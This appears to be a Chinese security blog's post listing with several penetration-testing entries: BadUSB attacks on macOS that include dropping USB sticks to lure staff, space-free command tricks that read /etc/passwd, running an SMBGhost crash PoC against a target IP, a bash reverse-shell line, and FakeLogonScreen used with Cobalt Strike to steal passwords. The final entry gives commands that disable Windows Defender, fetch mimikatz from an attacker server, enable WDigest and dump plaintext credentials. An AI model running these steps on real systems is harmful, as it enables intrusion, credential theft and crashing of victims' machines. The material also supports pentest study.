Badusb 攻击之MacOSX系统实战

Badusb 已经出现了很多年,使用usb进行攻击的手段也从最初的利用autorun.inf、伪造文件夹名、快捷方式等手段转为更加难以防御的Badusb。这种攻击方式就是目前可绕过杀毒软件,防御较难。

下面先看一下视频演示效果(youtube,请fq观看,如无法观看,请点此打开观看):

利用场景

说下本文中利用场景:

  1. 混入企业内部,员工电脑未锁屏的情况下。在之前去过很多客户那里,大多数企业的员工离开电脑前不锁屏的情况,而且非常严重。
  2. 对于无安全意识的员工进行攻击,如公司文员、前台、行政等,例如将usb贴上保密、照片等字样,并扔到显眼位置,以吸引人来捡并插入其电脑。

针对Badusb攻击手段还有很多,利用场景也还有,这里仅列出与本文有关的部分。下面就让我们正式开始进入制作。

准备工作

硬件

  • Arduino Leonardo 淘宝上直接搜索Badusb,有很多卖的,价格都比较便宜。

软件

  • Arduino IDE 官网下载地址:https://www.arduino.cc/en/Main/Software
  • 免杀木马,我这里macos下直接用的反弹shell,windows下使用的是免杀的meterpreter,payload为reverse_tcp。由于免杀不是本文重点,请自行制作。

基础知识

Badusb属于HID注入攻击的一种形式。HID是Human Interface Device的缩写,HID设备是直接与人交互的设备,例如键盘、鼠标与游戏杆等。不过HID设备并不一定要有人机接口,只要符合HID类别规范的设备都是HID设备。今天使用的Arduino Leonardo板子主要是一款键盘注入工具,除此之外还有WIFI版的(通过链接wifi,然后发起攻击)、伪装为充电线的(USB-C)。目前,前者成本较低,后者成本较高。有国外安全研究人员有在售卖USB Cable。有一些手机也支持用来进行hid注入攻击。比如GOOGLE NEXUS手机,刷入kali nethunter系统即可,在淘宝上可以购买到二手手机,成本只要300左右。

安装好arduino ide后,插入Arduino Leonardo板子,打开arduino ide,选择【工具】-【开发版】-【Arduino Leonardo】。

接下来就开始编写攻击代码了。默认显示的代码如下:

阅读全文 »

搭建自己的CyberChef

CyberChef是一个很好很强大的程序,很实用。

由于官方发布的线上地址使用了google统计,为了安全,还是自己搭建或者本地使用。本地就仅限于自己的电脑才可使用。所以搭建自己线上的可以随时使用,方便许多。同时配合Open in CyberChef这个浏览器插件就更加方便。

直接下载官方生成的包,下载地址:https://github.com/gchq/CyberChef/releases

我这里直接上传到github,并且启用github pages。然后绑定解析自己的域名即可线上访问。我这里搭建好的无google统计的地址:https://cyberchef.bacde.me

接下来安装Open in CyberChef 这个chrome插件。插件地址:https://chrome.google.com/webstore/detail/open-in-cyberchef/aandeoaihmciockajcgadkgknejppjdl/related

这样就可以直接右键发送到自己的cyberchef,方便了很多。使用效果如下:

bashtricks :无空格命令执行

在一些漏洞利用场景,或者因为waf等原因,导致无法使用空格时,可以试试如下命令:

IFS=,;`cat<<<cat,/etc/passwd` 
cat$IFS/etc/passwd 
cat${IFS}/etc/passwd 
cat</etc/passwd 
{cat,/etc/passwd} 
X=$'cat\x20/etc/passwd'&&$X

经过测试,除最后一条在mac osx下执行失败,这些命令在ubuntu 19.10和centos7下均执行成功。在mac osx系统下系统会将cat\x20/etc/passwd当成一个可执行文件,会提示No such file or directory。

来源:https://twitter.com/omespino/status/1241544334329208838

BigIP Cookie 解码获取真实IP

BIGip是对负载均衡的实现,主要通过Virtual Server、iRules、Pool、Node、Monitor和Persistent(会话保持)实现。BIGip在实现会话保持机制时会在用户首次发起请求时,会为用户设置一个cookie,即服务端会添加set-cookie响应头头(比如:Set-Cookie: BIGipServerFinanceAndAdminWebfo.unc.edu=105389996.20480.0000 )。后续的请求会判断并使用这个cookie值,服务端解码该cookie并使用服务器。

最近发现一款工具,可以解BigIP的cookie,以此获取内网ip或者真实ip地址。这款工具名叫rabid,是ruby语言编写,支持4种cookie格式。github地址:https://github.com/Orange-Cyberdefense/rabid

工具使用

工具使用ruby编写,需要ruby 2.4以上版本的环境。首先要保证安装好ruby。然后使用gem安装包

gem install rabid

安装完成后,可以使用ruby包含该库,也可以直接运行命令执行。

命令示例如下:
rabid 'BIGipServer~FinanceAndAdminWeb~fo.unc.edu=105389996.20480.0000'

上面的参数就是set-cookie的值。

运行结果(运行环境macos,ruby 2.6.3):

在自己的代码中使用该库,代码示例如下:

阅读全文 »

SMBGhost 蓝屏代码(测试成功)

CVE-2020-0796 蓝屏的代码。twitter上发现的。本地虚拟机,Windows10专业版1903测试成功.

使用方法:

安装impacket库

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
python setup.py install

直接使用pip安装的不行,所以clone最新版本的,然后安装,在Mac系统下需要sudo权限。

安装成功后,下载该代码。执行如下命令:

python gistfile1.py 目标IP

运行后效果:

代码下载地址:https://github.com/insightglacier/SMBGhost_Crash_Poc

代码原始地址(需翻墙):https://gist.github.com/asolino/45095268f0893bcf08bca3ae68a755b2

作者twitter :https://twitter.com/agsolino

分享个学习shell脚本或辅助理解的网站-explainshell.com

有的时候我们会遇到一些特别难理解的shell命令,或者是一些参数我们不知道它的作用。那么今天分享的这个网址可以帮助解决上面的烦恼。

网站主页打开后就是一个输入框。输入命令后,就会给出解析的结果。结果包含了解析的结果,并在下面给出了详细的说明。很方便。例如我们以bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 为例(如下图),很酷~

该网站有两种主题,分别是Light和Drak。

网址:explainshell

伪造windows登录屏幕窃取密码之FakeLogonScreen

在windows环境中,获取系统密码,提升系统权限。在渗透测试是经常遇到的。今天这里介绍一款伪造windows登录屏幕以达到窃取密码或题全的软件——FakeLogonScreen。

简介

FakeLogonScreen这个程序是用于伪造windows登录凭证以获取系统登录密码。它会获取当前系统配置的背景图片,这样显得更加真实,成功率也会更高。

另外,该程序会对输入的密码进行Active Directory或本地计算机的认证,以确保窃取密码的准确性。它可以显示在控制台,也可以保存早文件远程系统的硬盘上。

这个软件的好处就是可以与其它工具配合使用,可以直接通过内存执行(无文件)。比如可以配合Cobalt Strike的execute-assembly来执行。

运行环境

由于使用c#编写,需要系统中有.net framework框架。这里测试windows10和windows7,系统均为64位。在其release的版本中,作者给出来.net framework3.5和4.5的可执行程序。适用于windows7 和windows10等情况。实际中可根据实际情况进行选择。

利用

可以配合Cobalt Strike,系统上线后,进入到beacon中,然后直接执行execute-assembly /root/Desktop/FakeLogonScreen.exe 。(后面为控制机上的文件路径,非被控机的路径)。接下来就是等待对方输入密码,即可在进入的beacon中显示输入的密码了。效果图如下:

也可以使用FakeLogonScreenToFile.exe 在本地执行后,然后去查看文件。

当然这个程序也有些问题,就是windows7也显示windows10样式的窗口,同时,界面显示仍然与系统原有的有区别,但是对于安全意识低的员工还是有作用的。

软件地址:FakeLogonScreen

Windows Server 2016抓取明文密码

临时禁止Windows Defender

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
gpupdate /force

下载mimikatz后解压缩。

powershell.exe -NoP -NonI -Exec Bypass -Command "& {Import-Module BitsTransfer; Start-BitsTransfer 'http://你的服务器/mimikatz_trunk.zip' "%APPDATA%\mimikatz_trunk.zip"}"

修改注册表开启UseLogonCredential

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

等用户下次再登录的时候,可抓到明文密码

mimikatz.exe privilege::debug
sekurlsa::logonpasswords exit